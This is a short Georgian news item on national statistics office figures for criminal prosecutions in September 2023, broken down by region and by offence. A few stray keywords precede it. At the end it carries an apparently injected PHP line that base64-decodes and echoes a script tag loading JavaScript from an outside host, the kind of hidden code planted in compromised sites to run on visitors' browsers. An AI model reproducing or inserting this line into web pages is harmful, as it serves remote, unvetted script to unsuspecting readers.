celsiusi
ავერსი საქკაბელი

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2023 წლის სექტემბერში სისხლის სამართლებრივი დევნა დაიწყო 2 043 პირის მიმართ. აქედან გამოსაცდელი ვადის გასვლამდე დანაშაული ჩადენილია 145 პირის მიერ, რაც დევნადაწყებული პირების 7,1 პროცენტს შეადგენს.

საქსტატის ცნობით, მიმდინარე წლის სექტემბერში დევნის დაწყების ყველაზე მაღალი მაჩვენებელი – 709 შემთხვევა, თბილისში ფიქსირდება. აჭარაში 285, ხოლო ოკუპირებული აფხაზეთის რეგიონებში ხუთი შემთხვევა.

2023 წლის სექტემბერში დევნის დაწყების მაჩვენებელი სსკ-ის კონკრეტული მუხლების მიხედვით ასე გადანაწილდა: ქურდობა – 313 შემთხვევა; მუქარა – 232 შემთხვევა; ოჯახური ძალადობა – 237 შემთხვევა; ძალადობა – 224 შემთხვევა; გაუპატიურება – ცხრა შემთხვევა; გარყვნილი ქმედება – რვა შემთხვევა; თაღლითობა – 164 შემთხვევა; ნარკოტიკული საშუალების, მისი ანალოგის ან პრეკურსორის უკანონო დამზადება, წარმოება, შეძენა, შენახვა, გადაზიდვა, გადაგზავნა ან გასაღება – 281 შემთხვევა; ნარკოტიკული საშუალების შემცველი მცენარის უკანონო დათესვა, მოყვანა ან კულტივირება – 198 შემთხვევა; ყალბი დოკუმენტების დამზადება – 107 შემთხვევა. ამასთან, საქსტატის ცნობით, მიმდინარე წლის სექტემბერში განზრახ მკვლელობის მუხლით – ორი შემთხვევა, ხოლო მკვლელობის მცდელობის მუხლით სამი შემთხვევა გამოვლინდა.

უწყების ანგარიშის მიხედვით, 2023 წლის სექტემბერში დაზარალებულთა რაოდენობამ 1 491 პირი შეადგინა. საქართველოს მასშტაბით, სისხლის სამართლებრივი დევნა 23 პირის მიმართ შეწყდა.

206
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");